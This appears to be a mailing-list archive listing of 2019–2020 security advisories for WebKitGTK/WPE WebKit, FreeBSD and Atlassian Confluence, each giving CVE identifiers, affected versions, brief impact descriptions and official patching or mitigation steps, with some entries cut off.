WebKitGTK and WPE WebKit Security Advisory WSA-2020-0002
WebKitGTK and WPE WebKit Security Advisory WSA-2020-0002 Date reported : February 14, 2020 Advisory ID : WSA-2020-0002 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2020-0002.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2020-0002.html CVE identifiers : CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2020-3862 Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4. Credit to Srikanth Gatta of Google Chrome. Impact: A malicious website may be able to cause a denial of service. Description: A denial of service issue was addressed with improved memory handling. CVE-2020-3864 Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4. Credit to Ryan Pickren (ryanpickren.com). Impact: A DOM object context may not have had a unique security origin. Description: A logic issue was addressed with improved validation. CVE-2020-3865 Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4. Credit to Ryan Pickren (ryanpickren.com). Impact: A top-level DOM object context may have incorrectly been considered secure. Description: A logic issue was addressed with improved validation. CVE-2020-3867 Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4. Credit to an anonymous researcher. Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management. CVE-2020-3868 Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4. Credit to Marcin Towalski of Cisco Talos. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the latest stable versions of WebKitGTK and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK and WPE WebKit team, February 14, 2020 signature.asc Description: OpenPGP digital signature
FreeBSD Security Advisory FreeBSD-SA-20:02.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:02.ipsec Security Advisory The FreeBSD Project Topic: Missing IPsec anti-replay window check Category: core Module: kernel Announced: 2020-01-28 Credits:Jean-Francois HREN Affects:FreeBSD 12.0 only Corrected: 2020-01-28 18:56:46 UTC (releng/12.0, 12.0-RELEASE-p13) CVE Name: CVE-2019-5613 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background IPsec is a suite of protocols providing data authentication, integrity, and confidentiality between two networked hosts. II. Problem Description A missing check means that an attacker can reinject an old packet and it will be accepted and processed by the IPsec endpoint. III. Impact The impact depends on the higher-level protocols in use over IPsec. For example, an attacker who can capture and inject packets could cause an action that was intentionally performed once to be repeated. IV. Workaround No workaround is available. Systems not using IPsec are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch # fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch.asc # gpg --verify ipsec.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - releng/12.0/ r357218 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5613> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:02.ipsec.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIWbQ/9EvRm9/pFezk65B8NR9BJFYzSbFv8GxtxNjcFJ0KpG48s7XxBg9BWNKMs b7dtGTRlPKGUh0CRfhkCzxx10JZ0Aeu+UNNWQrt7r34pku1bUTrOAqW9nxIBq8zr tihvShWxWmMb9roeGRQIDpDoRCDs/Ps5eZ9NkTIRIPnGvidm8FTr8eQIHxSQJ/dX 9bnQO1KP3Fz1+ywKA/poMdfXwdrUhiaPaC9AQ704lMiz881Itsi93Xw9HceKar0E dnbPbXMTQ+mkdVe3U2KLVDIMs119XL3Nuel2y7ACNjH3Bvjeerfjn6rZfiseV5FR muH0I+HKVdkdgWrFRPPthzUTmZYaStgbgOymsclwCpUJkS/ITgJWTpx6V+0E+4n6 bocwue5xP9EtCKDoEp3RSf17f47nbHgA0oeR+1CU9bh2lU6h2lAxRhxkPcWrgBiJ HWSJ96UyF3S9Kfj7sbKBE/0wPQYRO2fs2PSfjvjmydyYlg0gcZ25tK3sm5xyvxoG pVCwMn3gFDchEWnxJaSrGg/xoQCCWM+KdVXkaBSdCEsqs8+o6bTXPrq8ZyU451aO 7qxLPBlw5XNZ87jUEOhT3PwH49H9sAl++4IHUUUvs5pcIigdTNplgVpRt2DdFDzg ardLO/Cyr1qAAMClC3jXx0I7uTViROt3x7lg2+2V7bF5SnL8VjU= =tFox -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-20:01.libfetch
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:01.libfetch Security Advisory The FreeBSD Project Topic: libfetch buffer overflow Category: core Module: libfetch Announced: 2020-01-28 Credits:Duncan Overbruck Affects:All supported versions of FreeBSD. Corrected: 2020-01-28 18:40:55 UTC (stable/12, 12.1-STABLE) 2020-01-28 18:55:25 UTC (releng/12.1, 12.1-RELEASE-p2) 2020-01-28 18:55:25 UTC (releng/12.0, 12.0-RELEASE-p13) 2020-01-28 18:42:06 UTC (stable/11, 11.3-STABLE) 2020-01-28 18:55:25 UTC (releng/11.3, 11.3-RELEASE-p6) CVE Name: CVE-2020-7450 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background libfetch(3) is a multi-protocol file transfer library included with FreeBSD and used by the fetch(1) command-line tool, pkg(8) package manager, and others. II. Problem Description A programming error allows an attacker who can specify a URL with a username and/or password components to overflow libfetch(3) buffers. III. Impact An attacker in control of the URL to be fetched (possibly via HTTP redirect) may cause a heap buffer overflow, resulting in program misbehavior or malicious code execution. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch # fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch.asc # gpg --verify libfetch.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r357213 releng/12.1/ r357217 releng/12.0/ r357217 stable/11/r357214 releng/11.3/ r357217 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7450> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:01.libfetch.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whc5fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJw5BAAmi4Mk+an8qJB4GwfOSxWhn42GnN9/HikJwkiTNHQr7n51ANp4sHCgTYG PCo6UvCFqdIfhpBIrykI7ZwzAetCpldDdIMQFJoi5ChJ7aIcNDpiH06yLjYLgseS qSxJ+dXt6j7G2FMUWPBka8eTNBi64gT0MbyC7zFdISfJqfNy+p0WvdwYm3UsWkeR pEV+o6zL+PI3s6IsqQTQzYuyNYgoTLdvhjgNMymI+OMH8uCdBUrdItdSwSYPwVOp +8SUX47jMFNcIbBmuQ3KnPxu9fHx8JzfqpLDAkmp6hu6sXNTmIZ27mgItu4DRgWN nvd750H6fv9UCbRYOyvjeuEN8olOpZcoTAuQDtcC/z7BvKAwLC7oAYXZEiQ4pn/D MGMzlJU7fxiyIWDNJprzyrsgPAUhCC3ePyenTErB+GQKmf1fHTjLWJHN43W2tbqk kYzMwwLQa3KwOYzHPHbJt6F94b9dN30v8cgIVkvs5ivLr8eErIJAQ71PgxkgRQL1 /C301qeJvgBqLm+so0Ef6wi/D9HvCvyk6IqbQNEvOXD8RNtyqdhBO1jJ93zDVLLK ey5room7Hln/A3l5bXBzb6O3+q60U7lbxzokkAhNoe
FreeBSD Security Advisory FreeBSD-SA-20:03.thrmisc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-20:03.thrmiscSecurity Advisory The FreeBSD Project Topic: kernel stack data disclosure Category: core Module: kernel Announced: 2020-01-28 Credits:Ilja Van Sprundel Affects:All supported versions of FreeBSD. Corrected: 2019-11-15 16:40:10 UTC (stable/12, 12.1-STABLE) 2020-01-28 18:57:45 UTC (releng/12.1, 12.1-RELEASE-p2) 2020-01-28 18:57:45 UTC (releng/12.0, 12.0-RELEASE-p13) 2019-11-15 16:40:55 UTC (stable/11, 11.3-STABLE) 2020-01-28 18:57:45 UTC (releng/11.3, 11.3-RELEASE-p6) CVE Name: CVE-2019-15875 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The kernel can create a core dump file when a process crashes that contains process state, for debugging. II. Problem Description Due to incorrect initialization of a stack data structure, up to 20 bytes of kernel data stored previously stored on the stack will be exposed to a crashing user process. III. Impact Sensitive kernel data may be disclosed. IV. Workaround Core dumps may be disabled by setting the kern.coredump sysctl to 0. See sysctl(8) and sysctl.conf(5). V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch # fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch.asc # gpg --verify thrmisc.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r354734 releng/12.1/ r357219 releng/12.0/ r357219 stable/11/r354735 releng/11.3/ r357219 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15875> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-20:03.thrmisc.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl4whdVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLOgg/7BAIhE6SQ06BkCKNBerK3jj1sY2gBc7aohLbzdhEpCIrrd+sMsh0tphII ftR5psPaZahzjP9Mrs/lA1fWVsco1jo4icevGiPTfbEVqBF1S8XINccwQr3AvYJR 33PGUrgzY2rU8MTj0YPJ2EG3ahghb96lKkK3USikoJA5SsXSZkFphp2OFXnUFWbG TXWOUBWXbHMBUprf/oXcvNo/ZjDcxvJzMqT2YIGwKOsT0Xtx5nD+6C390axRuVEd sA6z1RhA/EEx6JMNSUAoG5rnJSXDYQTB2kd9ilozXi07CboVZ38loXy8492FGrin uG3MfnI+PHrMtG+S5yHwzOGhB/20DNoWqLKZobTGr46r8rrdc553F5Cn7ivLEz9Y Sk+IGjZfB99jv+JxCr/+/4gn3niOyh0MolqG9r0rT13fLmeQX5XtYfyYPJHE1wuR +JZ9TQSaJ6TX/DcIsy60OWcfWAQOeoYsvTZO6hqpjHt66m2Ah1pdAyc8c0R8yaQG tFpRhgQvYpiPJviq7NvM5V2afSo16RWWy9A+xEYUrxp0H0inVNOgdqwhln7ZzI4u YoBis/eZkNAPxqFJyvJ89TQFmsWFPcpHjAGMoL+aCuIotuHHa/MPdT2pfyqHG9iL E9axI8zhyzNUC+osR2I6DT/R8rF5QHAY8xI8FffiS8jfN3BJVm4= =3mdJ -END PGP SIGNATURE-
WebKitGTK and WPE WebKit Security Advisory WSA-2020-0001
WebKitGTK and WPE WebKit Security Advisory WSA-2020-0001 Date reported : January 23, 2020 Advisory ID : WSA-2020-0001 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2020-0001.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2020-0001.html CVE identifiers : CVE-2019-8835, CVE-2019-8844, CVE-2019-8846. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2019-8835 Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3. Credit to Anonymous working with Trend Micro's Zero Day Initiative, Mike Zhang of Pangu Team. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8844 Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3. Credit to William Bowling (@wcbowling). Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8846 Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3. Credit to Marcin Towalski of Cisco Talos. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A use after free issue was addressed with improved memory management. We recommend updating to the latest stable versions of WebKitGTK and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK and WPE WebKit team, January 23, 2020 signature.asc Description: OpenPGP digital signature
Confluence Server and Data Center Security Advisory - 2019-12-18 - CVE-2019-15006
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/doc/confluence-security-advisory-2019-12-18-982324349.html . CVE ID: * CVE-2019-15006. Product: Confluence Server and Data Center. Affected Confluence Server and Data Center product versions: 6.11.0 <= version < 6.13.10 6.12.0 <= version < 6.13.10 6.13.0 <= version < 6.13.10 6.14.0 <= version < 6.15.10 6.15.0 <= version < 6.15.10 7.0.1 <= version < 7.0.5 7.1.0 <= version < 7.1.2 version < 7.2.0 Fixed Confluence Server and Data Center product versions: * for 6.11.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue. * for 6.12.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue. * for 6.13.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue. * for 6.14.x, Confluence Server and Data Center 6.15.10 has been released with a fix for this issue. * for 6.15.x, Confluence Server and Data Center 6.15.10 has been released with a fix for this issue. * for 7.0.x, Confluence Server and Data Center 7.0.5 has been released with a fix for this issue. * for 7.1.x, Confluence Server and Data Center 7.1.2 has been released with a fix for this issue. * for 7.2.x, Confluence Server and Data Center 7.2.0 has been released with a fix for this issue. Summary: This advisory discloses a medium severity security vulnerability. Versions of Confluence Server and Data Center are affected by this vulnerability. Customers who have upgraded Confluence Server and Data Center to version 6.13.10 or 6.15.10 or 7.0.5 or 7.1.2 or 7.2.0 are not affected. Customers who have downloaded and installed Confluence Server and Data Center >= 6.11.0 but less than 6.13.10 (the fixed version for 6.11.x) or who have downloaded and installed Confluence Server and Data Center >= 6.12.0 but less than 6.13.10 (the fixed version for 6.12.x) or who have downloaded and installed Confluence Server and Data Center >= 6.13.0 but less than 6.13.10 (the fixed version for 6.13.x) or who have downloaded and installed Confluence Server and Data Center >= 6.14.0 but less than 6.15.10 (the fixed version for 6.14.x) or who have downloaded and installed Confluence Server and Data Center >= 6.15.0 but less than 6.15.10 (the fixed version for 6.15.x) or who have downloaded and installed Confluence Server and Data Center >= 7.0.1 but less than 7.0.5 (the fixed version for 7.0.x) or who have downloaded and installed Confluence Server and Data Center >= 7.1.0 but less than 7.1.2 (the fixed version for 7.1.x) or who have downloaded and installed Confluence Server and Data Center less than 7.2.0 (the fixed version for 7.2.x) please upgrade your Confluence Server and Data Center installations immediately to fix this vulnerability. Atlassian Companion Man-in-the-Middle - CVE-2019-15006 Severity: Atlassian rates the severity level of this vulnerability as medium, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was a man-in-the-middle (MITM) vulnerability present in the Confluence Previews plugin in Confluence Server and Confluence Data Center. This plugin was used to facilitate communication with the Atlassian Companion application. The Confluence Previews plugin in Confluence Server and Confluence Data Center communicated with the Companion application via the atlassian-domain-for-localhost-connections-only.com domain name, the DNS A record of which points at 127.0.0.1. Additionally, a signed certificate for the domain was publicly distributed with the Companion application. An attacker in the position to control DNS resolution of their victim could carry out a man-in-the-middle (MITM) attack between Confluence Server (or Confluence Data Center) and the atlassian-domain-for-localhost-connections-only.com domain intended to be used with the Companion application. This certificate has been revoked, however, usage of the atlassian-domain-for-localhost-connections-only.com domain name was still present in Confluence Server and Confluence Data Center. An attacker could perform the described attack by denying their victim access to certificate revocation information, and carry out a man-in-the-middle (MITM) attack to observe files being edited using the Companion application and/or modify them, and access some limited user information. Versions of Confluence Server and Data Center from version 6.11.0 before 6.13.10 (the fixed version for 6.13.x), from version 6.14.0 before 6.15.10 (the fixed version for 6.15.x), from version 7.0.1 before 7.0.5 (the fixed version for 7.0.x), from version 7.1.0 before 7.1.2 (the fixed version for 7.1.x), and from version 7.2.0-bet
FreeBSD Security Advisory FreeBSD-SA-19:25.mcepsc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:25.mcepsc Security Advisory The FreeBSD Project Topic: Machine Check Exception on Page Size Change Category: core Module: kernel Announced: 2019-11-12 Credits:Intel Affects:All supported versions of FreeBSD. Corrected: 2019-11-12 18:03:26 UTC (stable/12, 12.1-STABLE) 2019-11-12 18:13:04 UTC (releng/12.1, 12.1-RELEASE-p1) 2019-11-12 18:13:04 UTC (releng/12.0, 12.0-RELEASE-p12) 2019-11-12 18:04:28 UTC (stable/11, 11.3-STABLE) 2019-11-12 18:13:04 UTC (releng/11.3, 11.3-RELEASE-p5) CVE Name: CVE-2018-12207 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Intel machine check architecture is a mechanism to detect and report hardware errors, such as system bus errors, ECC errors, parity errors, and others. This allows the processor to signal the detection of a machine check error to the operating system. II. Problem Description Intel discovered a previously published erratum on some Intel platforms can be exploited by malicious software to potentially cause a denial of service by triggering a machine check that will crash or hang the system. III. Impact Malicious guest operating systems may be able to crash the host. IV. Workaround No workaround is available. Systems not running untrusted guest virtual machines are not impacted. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.1] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch.asc # gpg --verify mcepsc.12.1.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch.asc # gpg --verify mcepsc.12.0.patch.asc [FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch.asc # gpg --verify mcepsc.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r354650 releng/12.1/ r354653 releng/12.0/ r354653 stable/11/r354651 releng/11.3/ r354653 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://software.intel.com/security-software-guidance/software-guidance/machine-check-error-avoidance-page-size-change> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:25.mcepsc.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl3K+khfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5
FreeBSD Security Advisory FreeBSD-SA-19:26.mcu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:26.mcuSecurity Advisory The FreeBSD Project Topic: Intel CPU Microcode Update Category: 3rd party Module: Intel CPU microcode Announced: 2019-11-12 Credits:Intel Affects:All supported versions of FreeBSD running on certain Intel CPUs. CVE Name: CVE-2019-11135, CVE-2019-11139, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2018-11091, CVE-2017-5715 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background - From time to time Intel releases new CPU microcode to address functional issues and security vulnerabilities. Such a release is also known as a Micro Code Update (MCU), and is a component of a broader Intel Platform Update (IPU). FreeBSD distributes CPU microcode via the devcpu-data port and package. II. Problem Description Starting with version 1.26, the devcpu-data port/package includes updates and mitigations for the following technical and security advisories (depending on CPU model). Intel TSX Updates (TAA) CVE-2019-11135 Voltage Modulation VulnerabilityCVE-2019-11139 MD_CLEAR Operations CVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091 TA Indirect Sharing CVE-2017-5715 EGETKEY CVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091 JCC SKX102 Erratum Updated microcode includes mitigations for CPU issues, but may also cause a performance regression due to the JCC erratum mitigation. Please visit http://www.intel.com/benchmarks for further information. Please visit http://www.intel.com/security for detailed information on these advisories as well as a list of CPUs that are affected. III. Impact Operating a CPU without the latest microcode may result in erratic or unpredictable behavior, including system crashes and lock ups. Certain issues listed in this advisory may result in the leakage of privileged system information to unprivileged users. Please refer to the security advisories listed above for detailed information. IV. Workaround To determine if TSX is present in your system, run the following: 1. kldload cpuctl 2. cpucontrol -i 7 /dev/cpuctl0 If bits 4 (0x10) and 11 (0x800) are set in the second response word (EBX), TSX is present. In the absence of updated microcode, TAA can be mitigated by enabling the MDS mitigation: 3. sysctl hw.mds_disable=1 Systems must be running FreeBSD 11.3, FreeBSD 12.1, or later for this to work. *IMPORTANT* If your use case can tolerate leaving the CPU issues unmitigated and cannot tolerate a performance regression, ensure that the devcpu-data package is not installed or is locked at 1.25 or earlier. # pkg delete devcpu-data or # pkg lock devcpu-data Later versions of the LLVM and GCC compilers will include changes that partially relieve the peformance impact. V. Solution Install the latest Intel Microcode Update via the devcpu-data port/package, version 1.26 or later. Updated microcode adds the ability to disable TSX. With updated microcode the issue can still be mitigated by enabling the MDS mitigation as described in the workaround section, or by disabling TSX instead: 1. kldload cpuctl 2. cpucontrol -i 7 /dev/cpuctl0 If bit 29 (0x2000) is set in the fourth response word (EDX), then the 0x10a MSR is present. 3. cpucontrol -m 0x10a /dev/cpuctl0 If bit 8 (0x100) of the response word is set, your CPU is not vulnerable to TAA and no further action is required. If bit 7 (0x80) is cleared, then your CPU does not have updated microcode that facilitates TSX to be disabled. The only remedy available is to enable the MDS mitigation, as documented above. 4. cpucontrol -m 0x122=3 /dev/cpuctl0 Repeat step 4 for each numbered CPU that is present. A future kernel change to FreeBSD will provide automatic detection and mitigation for TAA. LLVM 9.0 will be updated in FreeBSD 13-current to address the JCC peformance impact. Updates to prior versions of LLVM are currently being evaluated. VI. Correction details There are currently no changes in FreeBSD to address this issue. VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139> https://cve.
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0006
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0006 Date reported : November 08, 2019 Advisory ID : WSA-2019-0006 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0006.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0006.html CVE identifiers : CVE-2019-8710, CVE-2019-8743, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2019-8710 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to found by OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8743 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to zhunki from Codesafe Team of Legendsec at Qi'anxin Group. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8764 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to Sergei Glazunov of Google Project Zero. Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management. CVE-2019-8765 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to Samuel Groß of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8766 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to found by OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8782 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to Cheolung Lee of LINE+ Security Team. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8783 Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1. Credit to Cheolung Lee of LINE+ Graylab Security Team. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8808 Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0. Credit to found by OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8811 Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1. Credit to Soyeon Park of SSLab at Georgia 